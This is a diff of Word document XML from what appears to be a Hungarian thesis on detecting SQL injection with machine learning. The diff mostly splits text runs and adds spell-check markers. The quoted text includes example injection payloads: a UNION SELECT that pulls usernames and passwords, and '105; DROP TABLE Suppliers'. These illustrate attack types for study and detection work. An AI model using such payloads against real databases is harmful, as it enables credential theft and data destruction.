+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>learning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -881,15 +1047,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy kód SQL injection</w:t>
-      </w:r>
+        <w:t xml:space="preserve">egy kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">beli </w:t>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>beli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1029,14 +1213,42 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Visual Studio Code</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Visual </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>Studio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
       </w:r>
       <w:r>
@@ -1061,7 +1273,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a grafikus </w:t>
+        <w:t>a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1069,6 +1281,14 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">asztali </w:t>
       </w:r>
       <w:r>
@@ -1077,7 +1297,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>felület megvalósításához</w:t>
+        <w:t>alkalmazás</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1085,6 +1305,14 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> megvalósításához</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -1093,6 +1321,14 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">back-end-en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>Java</w:t>
       </w:r>
       <w:r>
@@ -1101,7 +1337,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>FX</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1109,6 +1345,38 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>programozási nyelvet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nt-end-en FXML leíró</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -1117,7 +1385,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>programozási nyelvet</w:t>
+        <w:t xml:space="preserve">nyelvek </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1125,7 +1393,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> alkalmaztam.</w:t>
+        <w:t>alkalmaztam.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1134,6 +1402,22 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Verziókövetésre a GitHub</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> rendszert használtam.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1183,7 +1467,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">grafikus felületen </w:t>
+        <w:t>felhasználói</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felületen </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1308,8 +1600,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> train/test készlet,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1318,8 +1611,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1328,7 +1622,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>/test készlet,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1338,7 +1632,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1348,7 +1642,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1358,8 +1652,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion m</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1368,7 +1663,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1378,8 +1673,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">trix, </w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1388,8 +1684,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1398,7 +1695,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ecal</w:t>
+        <w:t>m</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1408,8 +1705,61 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ecal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>l</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -3351,7 +3701,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3425,7 +3775,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3499,7 +3849,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3573,7 +3923,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3647,7 +3997,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>27</w:t>
+              <w:t>26</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4053,7 +4403,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A téma</w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4061,6 +4418,7 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4129,7 +4487,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>The Open Web Application Security Project</w:t>
+        <w:t xml:space="preserve">The Open Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4299,16 +4685,62 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>' UNION SELECT username, password FROM user</w:t>
-      </w:r>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>s</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4365,6 +4797,7 @@
         </w:rPr>
         <w:t xml:space="preserve">létezik </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4373,12 +4806,14 @@
         </w:rPr>
         <w:t>users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> tábla, valamint </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4387,12 +4822,14 @@
         </w:rPr>
         <w:t>username</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> és </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4401,6 +4838,7 @@
         </w:rPr>
         <w:t>password</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4419,8 +4857,144 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gifts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4558,18 +5132,33 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
+        <w:t>(in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>classic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4849,8 +5438,18 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>105; DROP TABLE Suppliers</w:t>
-      </w:r>
+        <w:t xml:space="preserve">105; DROP TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Suppliers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -4930,6 +5529,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4938,6 +5538,7 @@
         </w:rPr>
         <w:t>Users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4962,6 +5563,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4970,6 +5572,7 @@
         </w:rPr>
         <w:t>UserId</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5042,6 +5645,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5066,6 +5670,7 @@
         </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -5173,7 +5778,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (error-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5390,19 +6009,31 @@
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:r>
-        <w:t>, inferential</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inferential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5547,7 +6178,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (boolean-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5691,7 +6336,97 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+        <w:t xml:space="preserve"> SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>doby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5934,7 +6669,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(time-based) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>time-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5978,11 +6727,19 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6006,6 +6763,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
